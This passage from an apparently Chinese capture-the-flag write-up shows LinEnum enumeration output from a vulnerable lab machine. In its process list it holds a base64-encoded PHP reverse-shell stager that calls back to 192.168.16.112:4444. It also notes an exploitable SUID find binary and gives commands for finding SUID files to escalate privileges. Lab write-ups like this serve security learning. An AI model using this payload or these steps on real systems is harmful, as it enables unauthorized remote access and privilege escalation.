1004 root       134  0.0  0.0      0     0 ?        S    00:08   0:00 [scsi_eh_2]
1005 root       135  0.0  0.0      0     0 ?        S    00:08   0:00 [scsi_eh_3]
1006 root       136  0.0  0.0      0     0 ?        S    00:08   0:00 [scsi_eh_4]
1007 root       137  0.0  0.0      0     0 ?        S    00:08   0:00 [scsi_eh_5]
1008 root       138  0.0  0.0      0     0 ?        S    00:08   0:00 [scsi_eh_6]
1009 root       139  0.0  0.0      0     0 ?        S    00:08   0:00 [scsi_eh_7]
1010 root       140  0.0  0.0      0     0 ?        S    00:08   0:00 [scsi_eh_8]
1011 root       141  0.0  0.0      0     0 ?        S    00:08   0:00 [scsi_eh_9]
1012 root       142  0.0  0.0      0     0 ?        S    00:08   0:00 [scsi_eh_10]
1013 root       143  0.0  0.0      0     0 ?        S    00:08   0:00 [scsi_eh_11]
1014 root       144  0.0  0.0      0     0 ?        S    00:08   0:00 [scsi_eh_12]
1015 root       145  0.0  0.0      0     0 ?        S    00:08   0:00 [scsi_eh_13]
1016 root       146  0.0  0.0      0     0 ?        S    00:08   0:00 [scsi_eh_14]
1017 root       147  0.0  0.0      0     0 ?        S    00:08   0:00 [scsi_eh_15]
1018 root       148  0.0  0.0      0     0 ?        S    00:08   0:00 [scsi_eh_16]
1019 root       149  0.0  0.0      0     0 ?        S    00:08   0:00 [scsi_eh_17]
1020 root       150  0.0  0.0      0     0 ?        S    00:08   0:00 [scsi_eh_18]
1021 root       151  0.0  0.0      0     0 ?        S    00:08   0:00 [scsi_eh_19]
1022 root       152  0.0  0.0      0     0 ?        S    00:08   0:00 [scsi_eh_20]
1023 root       153  0.0  0.0      0     0 ?        S    00:08   0:00 [scsi_eh_21]
1024 root       154  0.0  0.0      0     0 ?        S    00:08   0:00 [scsi_eh_22]
1025 root       155  0.0  0.0      0     0 ?        S    00:08   0:00 [scsi_eh_23]
1026 root       156  0.0  0.0      0     0 ?        S    00:08   0:00 [scsi_eh_24]
1027 root       157  0.0  0.0      0     0 ?        S    00:08   0:00 [scsi_eh_25]
1028 root       158  0.0  0.0      0     0 ?        S    00:08   0:00 [scsi_eh_26]
1029 root       159  0.0  0.0      0     0 ?        S    00:08   0:00 [scsi_eh_27]
1030 root       160  0.0  0.0      0     0 ?        S    00:08   0:00 [scsi_eh_28]
1031 root       161  0.0  0.0      0     0 ?        S    00:08   0:00 [scsi_eh_29]
1032 root       162  0.0  0.0      0     0 ?        S    00:08   0:00 [scsi_eh_30]
1033 root       163  0.0  0.0      0     0 ?        S    00:08   0:00 [scsi_eh_31]
1034 root       190  0.0  0.0      0     0 ?        S    00:08   0:00 [kworker/u:29]
1035 root       191  0.0  0.0      0     0 ?        S    00:08   0:00 [kworker/u:30]
1036 root       308  0.0  0.0      0     0 ?        S    00:08   0:00 [jbd2/sda1-8]
1037 root       309  0.0  0.0      0     0 ?        S<   00:08   0:00 [ext4-dio-unwrit]
1038 root       458  0.0  0.1   2688  1244 ?        Ss   00:08   0:00 udevd --daemon
1039 root       543  0.0  0.0      0     0 ?        S<   00:08   0:00 [ttm_swap]
1040 root       699  0.0  0.0      0     0 ?        S<   00:08   0:00 [kpsmoused]
1041 root      1866  0.0  0.0   2388   904 ?        Ss   00:08   0:00 /sbin/rpcbind -w
1042 statd     1897  0.0  0.1   2660  1280 ?        Ss   00:08   0:00 /sbin/rpc.statd
1043 root      1902  0.0  0.0   2684   888 ?        S    00:08   0:00 udevd --daemon
1044 root      1903  0.0  0.0      0     0 ?        S<   00:08   0:00 [rpciod]
1045 root      1905  0.0  0.0      0     0 ?        S<   00:08   0:00 [nfsiod]
1046 root      1912  0.0  0.0   2592   568 ?        Ss   00:08   0:00 /usr/sbin/rpc.idmapd
1047 root      2215  0.0  0.2  28352  2080 ?        Sl   00:08   0:00 /usr/sbin/rsyslogd -c5
1048 root      2267  0.0  0.0   1892   608 ?        Ss   00:08   0:00 /usr/sbin/acpid
1049 root      2303  0.0  0.8  43680  8928 ?        Ss   00:08   0:00 /usr/sbin/apache2 -k start
1050 daemon    2347  0.0  0.0   2168   316 ?        Ss   00:08   0:00 /usr/sbin/atd
1051 103       2353  0.0  0.0   3032   644 ?        Ss   00:08   0:00 /usr/bin/dbus-daemon --system
1052 www-data  2381  0.0  1.3  48448 14420 ?        S    00:08   0:00 /usr/sbin/apache2 -k start
1053 www-data  2382  0.0  1.2  47424 13408 ?        S    00:08   0:00 /usr/sbin/apache2 -k start
1054 www-data  2383  0.0  1.4  47676 14836 ?        S    00:08   0:01 /usr/sbin/apache2 -k start
1055 www-data  2384  0.0  1.1  46148 12080 ?        S    00:08   0:00 /usr/sbin/apache2 -k start
1056 root      2438  0.0  0.0   3852   988 ?        Ss   00:08   0:00 /usr/sbin/cron
1057 root      2493  0.0  0.0   1948   588 ?        S    00:08   0:00 /bin/sh /usr/bin/mysqld_safe
1058 mysql     2831  0.0  4.7 329380 49184 ?        Sl   00:08   0:02 /usr/sbin/mysqld --basedir=/usr --datadir=/var/lib/mysql --plugin-dir=/usr/lib/mysql/plugin --user=mysql --pid-file=/var/run/mysqld/mysqld.pid --socket=/var/run/mysqld/mysqld.sock --port=3306
1059 root      2832  0.0  0.0   1868   604 ?        S    00:08   0:00 logger -t mysqld -p daemon.error
1060 101       3228  0.0  0.0   7424   992 ?        Ss   00:08   0:00 /usr/sbin/exim4 -bd -q30m
1061 root      3281  0.0  0.0   3796   840 tty2     Ss+  00:08   0:00 /sbin/getty 38400 tty2
1062 root      3282  0.0  0.0   3796   836 tty3     Ss+  00:08   0:00 /sbin/getty 38400 tty3
1063 root      3283  0.0  0.0   3796   840 tty4     Ss+  00:08   0:00 /sbin/getty 38400 tty4
1064 root      3284  0.0  0.0   3796   836 tty5     Ss+  00:08   0:00 /sbin/getty 38400 tty5
1065 root      3285  0.0  0.0   3796   840 tty6     Ss+  00:08   0:00 /sbin/getty 38400 tty6
1066 root      3287  0.0  0.0      0     0 ?        S    00:08   0:00 [flush-8:0]
1067 root      3298  0.0  0.2   5196  2356 ?        Ss   00:08   0:00 dhclient -v -pf /run/dhclient.eth0.pid -lf /var/lib/dhcp/dhclient.eth0.leases eth0
1068 root      3339  0.0  0.1   6496  1076 ?        Ss   00:08   0:00 /usr/sbin/sshd
1069 root      3354  0.0  0.0   3796   840 tty1     Ss+  00:09   0:00 /sbin/getty 38400 tty1
1070 www-data  3358  0.0  1.5  49688 15620 ?        S    00:18   0:00 /usr/sbin/apache2 -k start
1071 www-data  3360  0.0  1.1  45892 11832 ?        S    00:18   0:00 /usr/sbin/apache2 -k start
1072 www-data  3361  0.0  1.6  51624 16812 ?        S    00:18   0:00 /usr/sbin/apache2 -k start
1073 www-data  3381  0.0  1.1  45892 11828 ?        S    00:32   0:00 /usr/sbin/apache2 -k start
1074 www-data  3385  0.0  1.2  47436 13392 ?        S    00:32   0:00 /usr/sbin/apache2 -k start
1075 www-data  3386  0.0  1.2  47416 13320 ?        S    00:32   0:00 /usr/sbin/apache2 -k start
1076 www-data  3405  0.0  0.0   1948   540 ?        S    00:39   0:00 sh -c php -r 'eval(base64_decode(Lyo8P3BocCAvKiovIGVycm9yX3JlcG9ydGluZygwKTsgJGlwID0gJzE5Mi4xNjguMTYuMTEyJzsgJHBvcnQgPSA0NDQ0OyBpZiAoKCRmID0gJ3N0cmVhbV9zb2NrZXRfY2xpZW50JykgJiYgaXNfY2FsbGFibGUoJGYpKSB7ICRzID0gJGYoInRjcDovL3skaXB9OnskcG9ydH0iKTsgJHNfdHlwZSA9ICdzdHJlYW0nOyB9IGlmICghJHMgJiYgKCRmID0gJ2Zzb2Nrb3BlbicpICYmIGlzX2NhbGxhYmxlKCRmKSkgeyAkcyA9ICRmKCRpcCwgJHBvcnQpOyAkc190eXBlID0gJ3N0cmVhbSc7IH0gaWYgKCEkcyAmJiAoJGYgPSAnc29ja2V0X2NyZWF0ZScpICYmIGlzX2NhbGxhYmxlKCRmKSkgeyAkcyA9ICRmKEFGX0lORVQsIFNPQ0tfU1RSRUFNLCBTT0xfVENQKTsgJHJlcyA9IEBzb2NrZXRfY29ubmVjdCgkcywgJGlwLCAkcG9ydCk7IGlmICghJHJlcykgeyBkaWUoKTsgfSAkc190eXBlID0gJ3NvY2tldCc7IH0gaWYgKCEkc190eXBlKSB7IGRpZSgnbm8gc29ja2V0IGZ1bmNzJyk7IH0gaWYgKCEkcykgeyBkaWUoJ25vIHNvY2tldCcpOyB9IHN3aXRjaCAoJHNfdHlwZSkgeyBjYXNlICdzdHJlYW0nOiAkbGVuID0gZnJlYWQoJHMsIDQpOyBicmVhazsgY2FzZSAnc29ja2V0JzogJGxlbiA9IHNvY2tldF9yZWFkKCRzLCA0KTsgYnJlYWs7IH0gaWYgKCEkbGVuKSB7IGRpZSgpOyB9ICRhID0gdW5wYWNr.KCJObGVuIiwgJGxlbik7ICRsZW4gPSAkYVsnbGVuJ107ICRiID0gJyc7IHdoaWxlIChzdHJsZW4oJGIpIDwgJGxlbikgeyBzd2l0Y2ggKCRzX3R5cGUpIHsgY2FzZSAnc3RyZWFtJzogJGIgLj0gZnJlYWQoJHMsICRsZW4tc3RybGVuKCRiKSk7IGJyZWFrOyBjYXNlICdzb2NrZXQnOiAkYiAuPSBzb2NrZXRfcmVhZCgkcywgJGxlbi1zdHJsZW4oJGIpKTsgYnJlYWs7IH0gfSAkR0xPQkFMU1snbXNnc29jayddID0gJHM7ICRHTE9CQUxTWydtc2dzb2NrX3R5cGUnXSA9ICRzX3R5cGU7IGlmIChleHRlbnNpb25fbG9hZGVkKCdzdWhvc2luJykgJiYgaW5pX2dldCgnc3Vob3Npbi5leGVjdXRvci5kaXNhYmxlX2V2YWwnKSkgeyAkc3Vob3Npbl9ieXBhc3M9Y3JlYXRlX2Z1bmN0aW9uKCcnLCAkYik7ICRzdWhvc2luX2J5cGFzcygpOyB9IGVsc2UgeyBldmFsKCRiKTsgfSBkaWUoKTs));'
1077 www-data  3406  0.0  0.8  41132  9032 ?        S    00:39   0:01 php -r eval(base64_decode(Lyo8P3BocCAvKiovIGVycm9yX3JlcG9ydGluZygwKTsgJGlwID0gJzE5Mi4xNjguMTYuMTEyJzsgJHBvcnQgPSA0NDQ0OyBpZiAoKCRmID0gJ3N0cmVhbV9zb2NrZXRfY2xpZW50JykgJiYgaXNfY2FsbGFibGUoJGYpKSB7ICRzID0gJGYoInRjcDovL3skaXB9OnskcG9ydH0iKTsgJHNfdHlwZSA9ICdzdHJlYW0nOyB9IGlmICghJHMgJiYgKCRmID0gJ2Zzb2Nrb3BlbicpICYmIGlzX2NhbGxhYmxlKCRmKSkgeyAkcyA9ICRmKCRpcCwgJHBvcnQpOyAkc190eXBlID0gJ3N0cmVhbSc7IH0gaWYgKCEkcyAmJiAoJGYgPSAnc29ja2V0X2NyZWF0ZScpICYmIGlzX2NhbGxhYmxlKCRmKSkgeyAkcyA9ICRmKEFGX0lORVQsIFNPQ0tfU1RSRUFNLCBTT0xfVENQKTsgJHJlcyA9IEBzb2NrZXRfY29ubmVjdCgkcywgJGlwLCAkcG9ydCk7IGlmICghJHJlcykgeyBkaWUoKTsgfSAkc190eXBlID0gJ3NvY2tldCc7IH0gaWYgKCEkc190eXBlKSB7IGRpZSgnbm8gc29ja2V0IGZ1bmNzJyk7IH0gaWYgKCEkcykgeyBkaWUoJ25vIHNvY2tldCcpOyB9IHN3aXRjaCAoJHNfdHlwZSkgeyBjYXNlICdzdHJlYW0nOiAkbGVuID0gZnJlYWQoJHMsIDQpOyBicmVhazsgY2FzZSAnc29ja2V0JzogJGxlbiA9IHNvY2tldF9yZWFkKCRzLCA0KTsgYnJlYWs7IH0gaWYgKCEkbGVuKSB7IGRpZSgpOyB9ICRhID0gdW5wYWNr.KCJObGVuIiwgJGxlbik7ICRsZW4gPSAkYVsnbGVuJ107ICRiID0gJyc7IHdoaWxlIChzdHJsZW4oJGIpIDwgJGxlbikgeyBzd2l0Y2ggKCRzX3R5cGUpIHsgY2FzZSAnc3RyZWFtJzogJGIgLj0gZnJlYWQoJHMsICRsZW4tc3RybGVuKCRiKSk7IGJyZWFrOyBjYXNlICdzb2NrZXQnOiAkYiAuPSBzb2NrZXRfcmVhZCgkcywgJGxlbi1zdHJsZW4oJGIpKTsgYnJlYWs7IH0gfSAkR0xPQkFMU1snbXNnc29jayddID0gJHM7ICRHTE9CQUxTWydtc2dzb2NrX3R5cGUnXSA9ICRzX3R5cGU7IGlmIChleHRlbnNpb25fbG9hZGVkKCdzdWhvc2luJykgJiYgaW5pX2dldCgnc3Vob3Npbi5leGVjdXRvci5kaXNhYmxlX2V2YWwnKSkgeyAkc3Vob3Npbl9ieXBhc3M9Y3JlYXRlX2Z1bmN0aW9uKCcnLCAkYik7ICRzdWhvc2luX2J5cGFzcygpOyB9IGVsc2UgeyBldmFsKCRiKTsgfSBkaWUoKTs));
1078 www-data  3408  0.0  0.0   1948   520 ?        S    00:40   0:00 sh -c /bin/sh 
1079 www-data  3409  0.0  0.0   1948   576 ?        S    00:40   0:00 /bin/sh
1080 root      3488  0.0  0.0      0     0 ?        S    01:01   0:00 [kworker/0:1]
1081 root      4393  0.0  0.0      0     0 ?        S    01:07   0:00 [kworker/0:2]
1082 www-data  4398  0.0  0.2   3824  2088 ?        S    01:08   0:00 /bin/bash ./LinEnum.sh
1083 www-data  4857  0.0  0.1   3876  1696 ?        S    01:08   0:00 /bin/bash ./LinEnum.sh
1084 www-data  4858  0.0  0.0   1876   448 ?        S    01:08   0:00 tee -a
1085 www-data  5028  0.0  0.1   3860  1416 ?        S    01:08   0:00 /bin/bash ./LinEnum.sh
1086 www-data  5029  0.0  0.0   2832   996 ?        R    01:08   0:00 ps aux
1087 
1088 
1089 [-] Process binaries and associated permissions (from above list):
1090 -rwxr-xr-x 1 root root   941252 Oct 27  2016 /bin/bash
1091 lrwxrwxrwx 1 root root        4 Mar  1  2012 /bin/sh -> dash
1092 -rwxr-xr-x 2 root root    26684 Dec 10  2012 /sbin/getty
1093 -rwxr-xr-x 1 root root    68180 May 22  2013 /sbin/rpc.statd
1094 -rwxr-xr-x 1 root root    42836 May 10  2017 /sbin/rpcbind
1095 -rwxr-xr-x 1 root root   436576 Feb 10  2015 /usr/bin/dbus-daemon
1096 -rwxr-xr-x 1 root root    42748 Apr 16  2013 /usr/sbin/acpid
1097 lrwxrwxrwx 1 root root       34 May 30  2018 /usr/sbin/apache2 -> ../lib/apache2/mpm-prefork/apache2
1098 -rwxr-xr-x 1 root root    21812 Oct  4  2014 /usr/sbin/atd
1099 -rwxr-xr-x 1 root root    43020 Jul  4  2012 /usr/sbin/cron
1100 -rwsr-xr-x 1 root root   937564 Feb 11  2018 /usr/sbin/exim4
1101 -rwxr-xr-x 1 root root 10585256 Apr 20  2018 /usr/sbin/mysqld
1102 -rwxr-xr-x 1 root root    28832 May 22  2013 /usr/sbin/rpc.idmapd
1103 -rwxr-xr-x 1 root root   388200 Oct  8  2014 /usr/sbin/rsyslogd
1104 -rwxr-xr-x 1 root root   531888 Jan 27  2018 /usr/sbin/sshd
1105 
1106 
1107 [-] /etc/init.d/ binary permissions:
1108 total 280
1109 drwxr-xr-x  2 root root 4096 Feb 19 23:01 .
1110 drwxr-xr-x 85 root root 4096 May  7 01:08 ..
1111 -rw-r--r--  1 root root 1586 Feb 19 23:02 .depend.boot
1112 -rw-r--r--  1 root root  669 Feb 19 23:02 .depend.start
1113 -rw-r--r--  1 root root  769 Feb 19 23:02 .depend.stop
1114 -rw-r--r--  1 root root 2427 Oct 16  2012 README
1115 -rwxr-xr-x  1 root root 2227 Apr 16  2013 acpid
1116 -rwxr-xr-x  1 root root 7820 May 26  2018 apache2
1117 -rwxr-xr-x  1 root root 1071 Jun 25  2011 atd
1118 -rwxr-xr-x  1 root root 1276 Oct 16  2012 bootlogs
1119 -rwxr-xr-x  1 root root 1281 Jul 15  2013 bootmisc.sh
1120 -rwxr-xr-x  1 root root 3816 Jul 15  2013 checkfs.sh
1121 -rwxr-xr-x  1 root root 1099 Jul 15  2013 checkroot-bootclean.sh
1122 -rwxr-xr-x  1 root root 9673 Jul 15  2013 checkroot.sh
1123 -rwxr-xr-x  1 root root 1379 Dec  9  2011 console-setup
1124 -rwxr-xr-x  1 root root 3033 Jul  3  2012 cron
1125 -rwxr-xr-x  1 root root 2813 Feb  6  2015 dbus
1126 -rwxr-xr-x  1 root root 6435 Feb 11  2018 exim4
1127 -rwxr-xr-x  1 root root 1329 Oct 16  2012 halt
1128 -rwxr-xr-x  1 root root 1423 Oct 16  2012 hostname.sh
1129 -rwxr-xr-x  1 root root 3880 Dec 10  2012 hwclock.sh
1130 -rwxr-xr-x  1 root root 7592 Apr 28  2012 kbd
1131 -rwxr-xr-x  1 root root 1591 Oct  1  2012 keyboard-setup
1132 -rwxr-xr-x  1 root root 1293 Oct 16  2012 killprocs
1133 -rwxr-xr-x  1 root root 1990 May 21  2012 kmod
1134 -rwxr-xr-x  1 root root 2405 Sep 26  2016 mcstrans
1135 -rwxr-xr-x  1 root root  995 Oct 16  2012 motd
1136 -rwxr-xr-x  1 root root  670 Feb 24  2013 mountall-bootclean.sh
1137 -rwxr-xr-x  1 root root 2128 Feb 24  2013 mountall.sh
1138 -rwxr-xr-x  1 root root 1508 Jul 15  2013 mountdevsubfs.sh
1139 -rwxr-xr-x  1 root root 1413 Jul 15  2013 mountkernfs.sh
1140 -rwxr-xr-x  1 root root  678 Feb 24  2013 mountnfs-bootclean.sh
1141 -rwxr-xr-x  1 root root 2440 Oct 16  2012 mountnfs.sh
1142 -rwxr-xr-x  1 root root 1731 Jul 15  2013 mtab.sh
1143 -rwxr-xr-x  1 root root 5437 Apr 19  2018 mysql
1144 -rwxr-xr-x  1 root root 4322 Mar 14  2013 networking
1145 -rwxr-xr-x  1 root root 6491 May 22  2013 nfs-common
1146 -rwxr-xr-x  1 root root 1346 May 20  2012 procps
1147 -rwxr-xr-x  1 root root 6120 Oct 16  2012 rc
1148 -rwxr-xr-x  1 root root  782 Oct 16  2012 rc.local
1149 -rwxr-xr-x  1 root root  117 Oct 16  2012 rcS
1150 -rwxr-xr-x  1 root root  639 Oct 16  2012 reboot
1151 -rwxr-xr-x  1 root root 2727 Sep 26  2016 restorecond
1152 -rwxr-xr-x  1 root root 1074 Jul 15  2013 rmnologin
1153 -rwxr-xr-x  1 root root 2344 May 10  2017 rpcbind
1154 -rwxr-xr-x  1 root root 3054 Oct  8  2014 rsyslog
1155 -rwxr-xr-x  1 root root 3200 Oct 16  2012 sendsigs
1156 -rwxr-xr-x  1 root root  590 Oct 16  2012 single
1157 -rw-r--r--  1 root root 4290 Oct 16  2012 skeleton
1158 -rwxr-xr-x  1 root root 3881 Apr 15  2016 ssh
1159 -rwxr-xr-x  1 root root 8827 Nov  9  2012 udev
1160 -rwxr-xr-x  1 root root 1179 Aug 20  2012 udev-mtab
1161 -rwxr-xr-x  1 root root 2721 Apr 10  2013 umountfs
1162 -rwxr-xr-x  1 root root 2195 Apr 10  2013 umountnfs.sh
1163 -rwxr-xr-x  1 root root 1122 Oct 16  2012 umountroot
1164 -rwxr-xr-x  1 root root 3111 Oct 16  2012 urandom
1165 -rwxr-xr-x  1 root root 1364 Oct 26  2015 virtualbox-guest-utils
1166 -rwxr-xr-x  1 root root 2666 Mar  3  2012 x11-common
1167 
1168 
1169 [-] /etc/init/ config file permissions:
1170 total 48
1171 drwxr-xr-x  2 root root 4096 Feb 19 22:25 .
1172 drwxr-xr-x 85 root root 4096 May  7 01:08 ..
1173 -rw-r--r--  1 root root  523 Mar 14  2013 network-interface-container.conf
1174 -rw-r--r--  1 root root 1603 Mar 14  2013 network-interface-security.conf
1175 -rw-r--r--  1 root root  803 Mar 14  2013 network-interface.conf
1176 -rw-r--r--  1 root root 1898 Mar 14  2013 networking.conf
1177 -rw-r--r--  1 root root  567 Feb 24  2013 startpar-bridge.conf
1178 -rw-r--r--  1 root root  637 Nov  5  2012 udev-fallback-graphics.conf
1179 -rw-r--r--  1 root root  769 Nov  5  2012 udev-finish.conf
1180 -rw-r--r--  1 root root  322 Nov  5  2012 udev.conf
1181 -rw-r--r--  1 root root  356 Nov  5  2012 udevmonitor.conf
1182 -rw-r--r--  1 root root  352 Nov  5  2012 udevtrigger.conf
1183 
1184 
1185 [-] /lib/systemd/* config file permissions:
1186 /lib/systemd/:
1187 total 4.0K
1188 drwxr-xr-x 6 root root 4.0K Feb 19 22:43 system
1189 
1190 /lib/systemd/system:
1191 total 56K
1192 drwxr-xr-x 2 root root 4.0K Feb 19 22:43 dbus.target.wants
1193 drwxr-xr-x 2 root root 4.0K Feb 19 22:43 multi-user.target.wants
1194 drwxr-xr-x 2 root root 4.0K Feb 19 22:43 sockets.target.wants
1195 drwxr-xr-x 2 root root 4.0K Feb 19 22:25 basic.target.wants
1196 -rw-r--r-- 1 root root  353 Feb 10  2015 dbus.service
1197 -rw-r--r-- 1 root root  106 Feb 10  2015 dbus.socket
1198 -rw-r--r-- 1 root root  190 Oct  8  2014 rsyslog.service
1199 -rw-r--r-- 1 root root  164 Apr 29  2013 udev-control.socket
1200 -rw-r--r-- 1 root root  177 Apr 29  2013 udev-kernel.socket
1201 -rw-r--r-- 1 root root  752 Apr 29  2013 udev-settle.service
1202 -rw-r--r-- 1 root root  291 Apr 29  2013 udev-trigger.service
1203 -rw-r--r-- 1 root root  384 Apr 29  2013 udev.service
1204 -rw-r--r-- 1 root root  155 Apr 16  2013 acpid.service
1205 -rw-r--r-- 1 root root  115 Apr 16  2013 acpid.socket
1206 
1207 /lib/systemd/system/dbus.target.wants:
1208 total 0
1209 lrwxrwxrwx 1 root root 14 Feb 10  2015 dbus.socket -> ../dbus.socket
1210 
1211 /lib/systemd/system/multi-user.target.wants:
1212 total 0
1213 lrwxrwxrwx 1 root root 15 Feb 10  2015 dbus.service -> ../dbus.service
1214 
1215 /lib/systemd/system/sockets.target.wants:
1216 total 0
1217 lrwxrwxrwx 1 root root 14 Feb 10  2015 dbus.socket -> ../dbus.socket
1218 lrwxrwxrwx 1 root root 22 Apr 29  2013 udev-control.socket -> ../udev-control.socket
1219 lrwxrwxrwx 1 root root 21 Apr 29  2013 udev-kernel.socket -> ../udev-kernel.socket
1220 
1221 /lib/systemd/system/basic.target.wants:
1222 total 0
1223 lrwxrwxrwx 1 root root 23 Apr 29  2013 udev-trigger.service -> ../udev-trigger.service
1224 lrwxrwxrwx 1 root root 15 Apr 29  2013 udev.service -> ../udev.service
1225 
1226 
1227 ### SOFTWARE #############################################
1228 [-] MYSQL version:
1229 mysql  Ver 14.14 Distrib 5.5.60, for debian-linux-gnu (i686) using readline 6.2
1230 
1231 
1232 [-] Apache user configuration:
1233 APACHE_RUN_USER=www-data
1234 APACHE_RUN_GROUP=www-data
1235 
1236 
1237 ### INTERESTING FILES ####################################
1238 [-] Useful file locations:
1239 /bin/nc
1240 /bin/netcat
1241 /usr/bin/wget
1242 /usr/bin/gcc
1243 /usr/bin/curl
1244 
1245 
1246 [-] Installed compilers:
1247 ii  checkpolicy                        2.1.8-2                          i386         SELinux policy compiler
1248 ii  gcc                                4:4.7.2-1                        i386         GNU C compiler
1249 ii  gcc-4.7                            4.7.2-5                          i386         GNU C compiler
1250 ii  gcc-4.7-multilib                   4.7.2-5                          i386         GNU C compiler (multilib files)
1251 ii  gcc-multilib                       4:4.7.2-1                        i386         GNU C compiler (multilib files)
1252 
1253 
1254 [-] Can we read/write sensitive files:
1255 -rw-r--r-- 1 root root 1057 Feb 19 23:51 /etc/passwd
1256 -rw-r--r-- 1 root root 612 Feb 19 23:51 /etc/group
1257 -rw-r--r-- 1 root root 851 Jul 30  2011 /etc/profile
1258 -rw-r----- 1 root shadow 870 Feb 28 12:10 /etc/shadow
1259 
1260 
1261 [-] SUID files:
1262 -rwsr-xr-x 1 root root 88744 Dec 10  2012 /bin/mount
1263 -rwsr-xr-x 1 root root 31104 Apr 13  2011 /bin/ping
1264 -rwsr-xr-x 1 root root 35200 Feb 27  2017 /bin/su
1265 -rwsr-xr-x 1 root root 35252 Apr 13  2011 /bin/ping6
1266 -rwsr-xr-x 1 root root 67704 Dec 10  2012 /bin/umount
1267 -rwsr-sr-x 1 daemon daemon 50652 Oct  4  2014 /usr/bin/at
1268 -rwsr-xr-x 1 root root 35892 Feb 27  2017 /usr/bin/chsh
1269 -rwsr-xr-x 1 root root 45396 Feb 27  2017 /usr/bin/passwd
1270 -rwsr-xr-x 1 root root 30880 Feb 27  2017 /usr/bin/newgrp
1271 -rwsr-xr-x 1 root root 44564 Feb 27  2017 /usr/bin/chfn
1272 -rwsr-xr-x 1 root root 66196 Feb 27  2017 /usr/bin/gpasswd
1273 -rwsr-sr-x 1 root mail 83912 Nov 18  2017 /usr/bin/procmail
1274 -rwsr-xr-x 1 root root 162424 Jan  6  2012 /usr/bin/find
1275 -rwsr-xr-x 1 root root 937564 Feb 11  2018 /usr/sbin/exim4
1276 -rwsr-xr-x 1 root root 9660 Jun 20  2017 /usr/lib/pt_chown
1277 -rwsr-xr-x 1 root root 248036 Jan 27  2018 /usr/lib/openssh/ssh-keysign
1278 -rwsr-xr-x 1 root root 5412 Mar 28  2017 /usr/lib/eject/dmcrypt-get-device
1279 -rwsr-xr-- 1 root messagebus 321692 Feb 10  2015 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
1280 -rwsr-xr-x 1 root root 84532 May 22  2013 /sbin/mount.nfs
1281 
1282 
1283 [+] Possibly interesting SUID files:
1284 -rwsr-xr-x 1 root root 162424 Jan  6  2012 /usr/bin/find
1285 
1286 
1287 [-] SGID files:
1288 -rwxr-sr-x 1 root ssh 128396 Jan 27  2018 /usr/bin/ssh-agent
1289 -rwsr-sr-x 1 daemon daemon 50652 Oct  4  2014 /usr/bin/at
1290 -rwxr-sr-x 1 root mlocate 30492 Sep 25  2010 /usr/bin/mlocate
1291 -rwxr-sr-x 1 root mail 17908 Nov 18  2017 /usr/bin/lockfile
1292 -rwxr-sr-x 1 root shadow 49364 Feb 27  2017 /usr/bin/chage
1293 -rwxr-sr-x 1 root tty 9708 Jun 11  2012 /usr/bin/bsd-write
1294 -rwxr-sr-x 1 root mail 9768 Nov 30  2014 /usr/bin/mutt_dotlock
1295 -rwxr-sr-x 1 root tty 18020 Dec 10  2012 /usr/bin/wall
1296 -rwxr-sr-x 1 root crontab 34760 Jul  4  2012 /usr/bin/crontab
1297 -rwxr-sr-x 1 root shadow 18168 Feb 27  2017 /usr/bin/expiry
1298 -rwsr-sr-x 1 root mail 83912 Nov 18  2017 /usr/bin/procmail
1299 -rwxr-sr-x 1 root mail 13960 Dec 12  2012 /usr/bin/dotlockfile
1300 -rwxr-sr-x 1 root utmp 4972 Feb 21  2011 /usr/lib/utempter/utempter
1301 -rwxr-sr-x 1 root shadow 30332 May  5  2012 /sbin/unix_chkpwd
1302 
1303 
1304 [-] Can't search *.conf files as no keyword was entered
1305 
1306 [-] Can't search *.php files as no keyword was entered
1307 
1308 [-] Can't search *.log files as no keyword was entered
1309 
1310 [-] Can't search *.ini files as no keyword was entered
1311 
1312 [-] All *.conf files in /etc (recursive 1 level):
1313 -rw-r--r-- 1 root root 45 May  7 01:08 /etc/resolv.conf
1314 -rw-r--r-- 1 root root 346 Mar 31  2012 /etc/discover-modprobe.conf
1315 -rw-r--r-- 1 root root 216 Sep 26  2016 /etc/sestatus.conf
1316 -rw-r--r-- 1 root root 1260 May 30  2008 /etc/ucf.conf
1317 -rw-r--r-- 1 root root 834 Jun  8  2012 /etc/gssapi_mech.conf
1318 -rw-r--r-- 1 root root 859 Nov 24  2012 /etc/insserv.conf
1319 -rw-r--r-- 1 root root 144 Feb 19 22:55 /etc/kernel-img.conf
1320 -rw-r--r-- 1 root root 3173 Dec 16  2017 /etc/reportbug.conf
1321 -rw-r--r-- 1 root root 599 Feb 19  2009 /etc/logrotate.conf
1322 -rw-r--r-- 1 root root 6895 Feb 19 22:44 /etc/ca-certificates.conf
1323 -rw-r--r-- 1 root root 284 Sep 25  2010 /etc/updatedb.conf
1324 -rw-r--r-- 1 root root 191 Feb  1  2012 /etc/libaudit.conf
1325 -rw-r--r-- 1 root root 604 May 16  2012 /etc/deluser.conf
1326 -rw-r--r-- 1 root root 2940 Feb 12  2016 /etc/gai.conf
1327 -rw-r--r-- 1 root root 2632 Oct  8  2014 /etc/rsyslog.conf
1328 -rw-r--r-- 1 root root 2082 May 20  2012 /etc/sysctl.conf
1329 -rw-r--r-- 1 root root 214 May 11  2013 /etc/idmapd.conf
1330 -rw-r--r-- 1 root root 956 Feb 22  2015 /etc/mke2fs.conf
1331 -rw-r--r-- 1 root root 552 Apr 30  2012 /etc/pam.conf
1332 -rw-r--r-- 1 root root 2981 Feb 19 22:25 /etc/adduser.conf
1333 -rw-r--r-- 1 root root 2969 Dec 26  2012 /etc/debconf.conf
1334 -rw-r--r-- 1 root root 9 Aug  8  2006 /etc/host.conf
1335 -rw-r--r-- 1 root root 34 Feb 19 22:24 /etc/ld.so.conf
1336 -rw-r--r-- 1 root root 475 Aug 29  2006 /etc/nsswitch.conf
1337 
1338 
1339 [-] Location and contents (if accessible) of .bash_history file(s):
1340 /home/flag4/.bash_history
1341 cd 
1342 ls
1343 vi flag4.txt
1344 ls
1345 exit
1346 
1347 
1348 [-] Any interesting mail in /var/mail:
1349 total 8
1350 drwxrwsr-x  2 root mail 4096 Feb 19 22:24 .
1351 drwxr-xr-x 12 root root 4096 Feb 19 23:10 ..
1352 
1353 
1354 ### SCAN COMPLETE ####################################
View Code

发现了弱点尝试进行suid提权

参考文章https://pentestlab.blog/2017/09/25/suid-executables/

find / -user root -perm -4000 -print 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
find / -user root -perm -4000 -exec ls -ldb {} \;

 

 

反弹shell 

